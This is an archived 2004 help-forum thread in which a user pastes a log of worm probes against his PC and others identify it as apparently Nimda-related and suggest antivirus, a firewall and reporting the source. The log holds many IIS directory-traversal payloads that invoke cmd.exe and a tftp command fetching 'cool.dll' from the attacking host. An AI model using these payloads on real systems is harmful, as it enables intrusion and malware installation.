Automatic Worm installation??

Computing.Net > Forums > Security and Virus > Automatic Worm installation??

Computer Problems? Computing.Net has over 1,000,000 posts about all things technology related! Over 90% answered within 24 hours! Click here to start participating now! Also, be sure to check out the New User Guide.

Automatic Worm installation??

Name: Damian_
Date: March 13, 2004 at 21:49:09 Pacific
OS: Windows 98
CPU/Ram: unknown

Comment:

I know someone is trying to install something on my computer can anyone tell me what this is: i was running some ip thing on my comp and this came up...very unexpectantly:
76 x Connection from 24.174.119.166
1 x IP Logged: 24.174.119.166- .exe?/c+dir
1 x IP Logged: 24.174.119.166- .exe?/c+tftp -i 24.174.119.166 GET cool.dll httpodbc.dll
1 x IP Logged: 24.174.119.166- odbc.dll
1 x IP Logged: 24.174.119.166- xe?/c+dir
1 x IP Logged: 24.174.119.166- xe?/c+tftp -i 24.174.119.166 GET cool.dll httpodbc.dll
1 x IP Logged: 24.174.119.166- bc.dll
2 x IP Logged: 24.174.119.166- em32/cmd.exe?/c+dir
2 x IP Logged: 24.174.119.166- em32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll c:\httpodbc.dll
2 x IP Logged: 24.174.119.166- em32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll d:\httpodbc.dll
2 x IP Logged: 24.174.119.166- em32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll e:\httpodbc.dll
2 x IP Logged: 24.174.119.166- ll
1 x IP Logged: 24.174.119.166- 55c../winnt/system32/cmd.exe?/c+dir
1 x IP Logged: 24.174.119.166- 55c../winnt/system32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll c:\httpodbc.dll
1 x IP Logged: 24.174.119.166- 55c../winnt/system32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll d:\httpodbc.dll
1 x IP Logged: 24.174.119.166- 55c../winnt/system32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll e:\httpodbc.dll
1 x IP Logged: 24.174.119.166- 55c../httpodbc.dll
2 x IP Logged: 24.174.119.166- 255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
2 x IP Logged: 24.174.119.166- 255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll c:\httpodbc.dll
2 x IP Logged: 24.174.119.166- 255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll d:\httpodbc.dll
2 x IP Logged: 24.174.119.166- 255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll e:\httpodbc.dll
2 x IP Logged: 24.174.119.166- 255c../..%255c../..%255c../httpodbc.dll
1 x IP Logged: 24.174.119.166- c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
1 x IP Logged: 24.174.119.166- c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll c:\httpodbc.dll
1 x IP Logged: 24.174.119.166- c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll d:\httpodbc.dll
1 x IP Logged: 24.174.119.166- c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll e:\httpodbc.dll
1 x IP Logged: 24.174.119.166- c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../httpodbc.dll
1 x IP Logged: 24.174.119.166- 1%1c../winnt/system32/cmd.exe?/c+dir
1 x IP Logged: 24.174.119.166- 1%1c../winnt/system32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll c:\httpodbc.dll
1 x IP Logged: 24.174.119.166- 1%1c../winnt/system32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll d:\httpodbc.dll
1 x IP Logged: 24.174.119.166- 1%1c../winnt/system32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll e:\httpodbc.dll
1 x IP Logged: 24.174.119.166- 1%1c../httpodbc.dll
1 x IP Logged: 24.174.119.166- 0%2f../winnt/system32/cmd.exe?/c+dir
1 x IP Logged: 24.174.119.166- 0%2f../winnt/system32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll c:\httpodbc.dll
1 x IP Logged: 24.174.119.166- 0%2f../winnt/system32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll d:\httpodbc.dll
1 x IP Logged: 24.174.119.166- 0%2f../winnt/system32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll e:\httpodbc.dll
1 x IP Logged: 24.174.119.166- 0%2f../httpodbc.dll
1 x IP Logged: 24.174.119.166- 0%af../winnt/system32/cmd.exe?/c+dir
1 x IP Logged: 24.174.119.166- 0%af../winnt/system32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll c:\httpodbc.dll
1 x IP Logged: 24.174.119.166- 0%af../winnt/system32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll d:\httpodbc.dll
1 x IP Logged: 24.174.119.166- 0%af../winnt/system32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll e:\httpodbc.dll
1 x IP Logged: 24.174.119.166- 0%af../httpodbc.dll
1 x IP Logged: 24.174.119.166- 1%9c../winnt/system32/cmd.exe?/c+dir
1 x IP Logged: 24.174.119.166- 1%9c../winnt/system32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll c:\httpodbc.dll
1 x IP Logged: 24.174.119.166- 1%9c../winnt/system32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll d:\httpodbc.dll
1 x IP Logged: 24.174.119.166- 1%9c../winnt/system32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll e:\httpodbc.dll
1 x IP Logged: 24.174.119.166- 1%9c../httpodbc.dll
1 x IP Logged: 24.174.119.166- 35%63../winnt/system32/cmd.exe?/c+dir
1 x IP Logged: 24.174.119.166- 35%63../winnt/system32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll c:\httpodbc.dll
1 x IP Logged: 24.174.119.166- 35%63../winnt/system32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll d:\httpodbc.dll
1 x IP Logged: 24.174.119.166- 35%63../winnt/system32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll e:\httpodbc.dll
1 x IP Logged: 24.174.119.166- 35%63../httpodbc.dll
1 x IP Logged: 24.174.119.166- 35c../winnt/system32/cmd.exe?/c+dir
1 x IP Logged: 24.174.119.166- 35c../winnt/system32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll c:\httpodbc.dll
1 x IP Logged: 24.174.119.166- 35c../winnt/system32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll d:\httpodbc.dll
1 x IP Logged: 24.174.119.166- 35c../winnt/system32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll e:\httpodbc.dll
1 x IP Logged: 24.174.119.166- 35c../httpodbc.dll
1 x IP Logged: 24.174.119.166- 5%35%63../winnt/system32/cmd.exe?/c+dir
1 x IP Logged: 24.174.119.166- 5%35%63../winnt/system32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll c:\httpodbc.dll
1 x IP Logged: 24.174.119.166- 5%35%63../winnt/system32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll d:\httpodbc.dll
1 x IP Logged: 24.174.119.166- 5%35%63../winnt/system32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll e:\httpodbc.dll
1 x IP Logged: 24.174.119.166- 5%35%63../httpodbc.dll
1 x IP Logged: 24.174.119.166- 52f../winnt/system32/cmd.exe?/c+dir
1 x IP Logged: 24.174.119.166- 52f../winnt/system32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll c:\httpodbc.dll
1 x IP Logged: 24.174.119.166- 52f../winnt/system32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll d:\httpodbc.dll
1 x IP Logged: 24.174.119.166- 52f../winnt/system32/cmd.exe?/c+tftp -i 24.174.119.166 GET cool.dll e:\httpodbc.dll
1 x IP Logged: 24.174.119.166- 52f../httpodbc.dll

sry if i wasnt suposed to include whoever was doing this's ip address but i dont give a damn
- Damian
Aim: Nizmo87

Sponsored Link

Ads by Google

Response Number 1

Name: blender
Date: March 14, 2004 at 06:41:17 Pacific

Reply:

Hmmmm
Quite interesting indeed...
I looked around and saw several other logs like that....many seem to be associated with the nimba worm.
It looks like someone's computer or a website you were on at the time is infected; If you are not up to date on antivirus software and windows...possibly you picked up the infection as well.
This site has fair bit of info:
http://www.avp.ch/avpve/worms/email/nimda.stm
also here:
http://ls.berkeley.edu/mail/micronet/2001/0925.html
another log like yours:
http://archives.neohapsis.com/archives/incidents/2002-09/0090.html
If you don't have antivirus or it seems broken...try an online scan at trend micro's housecall.
You have a program running to log ip addresses....are you running a firewall?
Zone alarm and sygate both offer a free version...quite affective. I think Kerio has one too.
Hope that helps.
________________________________
I never give up!
Windows Update

Response Number 2

Name: Damian_
Date: March 14, 2004 at 09:32:50 Pacific

Reply:

thanks alot..and no i wasnt running a firewall. If i run an ip logger and dont run a firewall does that leave my computer open?
- Damian
Aim: Nizmo87

Response Number 3

Name: Jeruvy
Date: March 14, 2004 at 14:15:49 Pacific

Reply:

Um, I know this looks nasty to you, but to anyone who operates a full-time network or web site sees this stuff all too often.
Best to note the IP and block it from further connections.
Then forget about it.
J.
j e r u v y a t y a h o o d o t c o m

Response Number 4

Name: blender
Date: March 14, 2004 at 17:09:38 Pacific

Reply:

Damian
An ip logger is just that...I don't know what ip logger you are running or if comes with firewall but if you don't have a firewall yes your computer is at risk. A firewall will block that kind of crap from comming in. You will see it in your firewall logs as blocked. If you spend a fair bit of time online or have full time internet connection I highly recommend installing one.
You could do a whois on that ip which should give you their ISP...then report it to them with your log...they then can inform their customer they are infected.
I have seen quite a few people having their internet disconnected until the worm is removed.
Another option is a router; about 100 bucks CDN$. Works as a hardware firewall and harder to break.
________________________
I never give up!
Windows Update

Response Number 5

Name: Damian_
Date: March 15, 2004 at 06:43:26 Pacific

Reply:

Thanks for the info guys!
- Damian
Aim: Nizmo87

pct789t-c1 C1 postcode ls date	ls regexp can you make a program run while logged out winnt installer
See More

Sponsored Link

Ads by Google

hijacked browser?

Virus Again? Please Help!

Post Locked

This post is quite old and has been locked from receiving new replies. Please create a new posting instead.

Go to Security and Virus Forum Home

Sponsored links

Ads by Google

Results for: Automatic Worm installation??

Winlogon Trojan/Worm

Summary

www.computing.net/answers/security/winlogon-trojanworm/20240.html

slow day for viruses

Summary

www.computing.net/answers/security/slow-day-for-viruses/7320.html

Fizzer stealth worm spreads via KaZ

Summary

www.computing.net/answers/security/fizzer-stealth-worm-spreads-via-kaz/5013.html

From the Geek Dictionary
Amiga - Computer created by former Atari engineer Jay Miner in the early 1980's. T...

Ask a Question!

Weekly Poll
Did you go shopping on Black Friday?

Poll Finishes In 3 Days.
Discuss in The Lounge
Poll History

Recent Posts
I cannot reconfigure my router

My Cd/DVD drive wont read anything

start up problems

Need new Vid card?

Driver for Umax Asra 2100U with Windows 7

All Awaiting Reply

Tom's News
12-inch Netbooks to Go Mainstream in 2010

Nintendo Sold 1.5 Million Systems Last Week

PS3 Sales Reach All Time High Over Black Friday

Google's Caffeine Search Engine Goes Live

Royal Navy to Use PSPs as Training Tools

More Tom's Guide News

Data Recovery

Manufacturer List | About Us | Advertising Info | Contact Us
The information on Computing.Net is the opinions of its users. Such opinions may not be accurate and they are to be used at your own risk. Computing.Net cannot verify the validity of the statements made on this site. Computing.Net and Computing.Net LLC hereby disclaim all responsibility and liability for the content of Computing.Net and its accuracy.
PLEASE READ THE FULL DISCLAIMER AND LEGAL TERMS BY CLICKING HERE